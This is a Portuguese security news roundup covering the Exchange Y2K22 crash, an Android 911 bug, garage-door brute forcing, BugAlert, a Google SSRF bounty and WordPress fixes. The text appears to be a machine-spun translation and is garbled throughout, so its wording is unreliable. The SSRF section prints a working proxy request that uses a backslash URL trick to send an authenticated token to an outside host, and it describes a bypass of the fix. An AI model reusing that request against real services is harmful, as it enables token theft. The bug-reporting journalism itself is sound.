Se você teve a infelicidade de funcionamento de um servidor Exchange Microsoft na semana passada, então você não exigência me dizer-lhe sobre o problema Y2K22 . Para captura resto de nós se, quando troca tentou baixar o primeiro definições de atualização de malware de 2022, o número da versão das novas definições provocou um acidente no mecanismo de detecção de malware. A data é representada como a corda 2201010001, onde os dois primeiros dígitos representam o ano. Essa seqüência é convertido para um inteiro longo assinado, que consegue no máximo 2,147,483,647. O número inteiro transborda, bem como o resultado é um comportamento indefinido, provocando falhas no motor. O servidor pára de trabalho seguro, não processar qualquer tipo de mensagens sem um malware motor a trabalhar, o que implica que nenhum e-mail fica completamente. ano novo feliz!
Android 911 Negação de Serviço
Discar 911 para serviços de emergência é bastante muito o pior momento para um bug aplicação de software para se manifestar. Google apenas fixa tal bug na actualização de Janeiro Android. É uma daquelas estranhas interações de aplicativos não-intencionais – nesta situação equipes Microsoft provocando o bug Android. Se o aplicativo equipes está instalado, no entanto nenhuma conta logado, equipes produz, bem como registros de um novo item PhoneAccount em cada lançamento. Isto parece que deveria ser raro, no entanto equipes no Android é igualmente notório para fazer logout do indivíduo espontaneamente. Quando você discar 911, o Android é executado uma rotina para identificar quais PhoneAccount deve ser utilizada para o caminho da chamada, bem como Resolve laços comparando hashes. Essa comparação é apenas uma subtração ingênuo, o que implica que há uma possibilidade de 50% na obtenção de um resultado desfavorável. Esta foi inesperada, levando ao acidente.
Garage Door Engenharia reversa
A engenharia reversa de um plano de autorização wireless 30-year-old pode não ser a façanha mais interesse agarrando, no entanto, em alguns casos a viagem é sua própria recompensa. [Maxwell Dulin] nos traz a história, assim como esta viagem é definitivamente vale a pena. Os fundamentos deste corte são certamente ainda viável, começando com a tomada de um olhar para o hardware. A porta da garagem está sincronizado com o portão de garagem, segurando um botão no receptor enquanto envia um código. no interior da abertura, há nove interruptores DIP, cada um com três posições. O que eles fazem? Ele puxou a SDR confiável para obter o tráfego na web, bem como tentar decodificar os sinais. Rádio GNU Inspectrum, assim como foram os heróis aqui, fornecendo informações sobre este esquema auth fácil. O pensamento final sobre este porta da garagem real? Você pode força bruta de um código desconhecido, enviando a cada combinação possível, bem como leva apenas 104 minutos.
BugAlert
Se você é um administrador de sistema, você entende que algumas questões telefonema para ação instantânea. Se você executou servidores Java, a vulnerabilidade Log4J foi um teste terminar de seu protocolo de reação. o tempo entre a divulgação pública, bem como sempre que você ouviu falar sobre isso, pode ter sido suficiente para compensar o desastre. Embora existam vários serviços de relatos de bugs, bem como quadros, nada, em vez se encaixa neste nicho utilizar caso: notificá-lo o mais rápido possível que seu cabelo pode realmente estar em chamas. Esse nicho não explorado sob escuta [Matthew Sullivan], que revelou um novo projeto, Alerta Bug. É tudo de código aberto, para que possa realizar o seu próprio exemplo, se você realmente quer fazer. Você pode optar por receber um tweet, texto ou chamada de telefone mesmo. Isto tem o potencial para ser uma ferramenta útil, dar uma olhada!
Eu sinto que eu exigência fazer Bug conjunto Alerta off uma canção estranha Al específico …
O SSRF Zombie
[David Schütz] estava procurando obscura Google APIs, bem como encontrado jobs.googleapis.com, que você pode demonstrar-se. Essa demonstração é interessante, já que não é um serviço completamente descarnada-out, no entanto fala com o back-end genuína. Os pedidos de ir com um proxy, cxl-services.appspot.com, que lida com a etapa de autenticação para a página de demonstração. Se ele pode desencadear uma Falsificação pedido do lado do servidor (SSRF), ele pode ser capaz de chegar às solicitações autenticadas, bem como, talvez, a técnica do proxy para o envio de tráfego web em seu nome. URL parsing é difícil. A técnica que trabalhou? Uma barra invertida na url. get /proxy?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/ HTTP / 1.1
Com um acesso ganho ao token na mão, [David] começou completamente verificar outros APIs do Google para ver o que este token forneceu-lhe ter acesso a a. Ele fornece a advertindo que cobrimos antes, ser cauteloso exatamente o quão longe você empurra. Ele poderia ter reportou o bug melhor distância, no entanto desejava verificar se ele realmente teve um acesso de ganho on-line para token. Depois de confirmar o token ajudou a check-out de acesso, ele virou-se na constatação, bem como uma saldada extremamente boa $ 3133,70, além de um adicional de US $ 1000 para um grande relatório, bem como o olhar cauteloso no movimento lateral. Isso é tudo que existe para ela, certo? Não. pouco antes do prazo de divulgação 90 dias passou, [David] encontraram um desvio de reparação. adding qualquer tipo de texto entre a barra invertida, bem como @ foi suficiente para quebrá-lo. mais um $ 3133.70. Apenas por diversão, ele sondou os antigos URLs, que não deveria estar em serviço após a correção. Sim, ele descobriu ainda mais um token de segurança e segurança, além de US $ 3133.70. Este zumbi SSRF ainda não está morto, como evidenciado no Twitter:
Atualização do WordPress.
Se você não definiu sua instância do WordPress para atualizar automaticamente, é hora de ir inspecionar para a versão mais recente. Há quatro problemas potencialmente prejudiciais aqui, embora os detalhes sejam escassos neste momento. Muito primeiro é uma vulnerabilidade de script transversal em publicar slugs, a parte do URL que corresponde ao nome da publicação. O segundo problema discutido é a injeção de itens em algumas configurações multisite. As duas últimas vulnerabilidades são injeções SQL, certamente merecendo o “ano que ano é?” meme.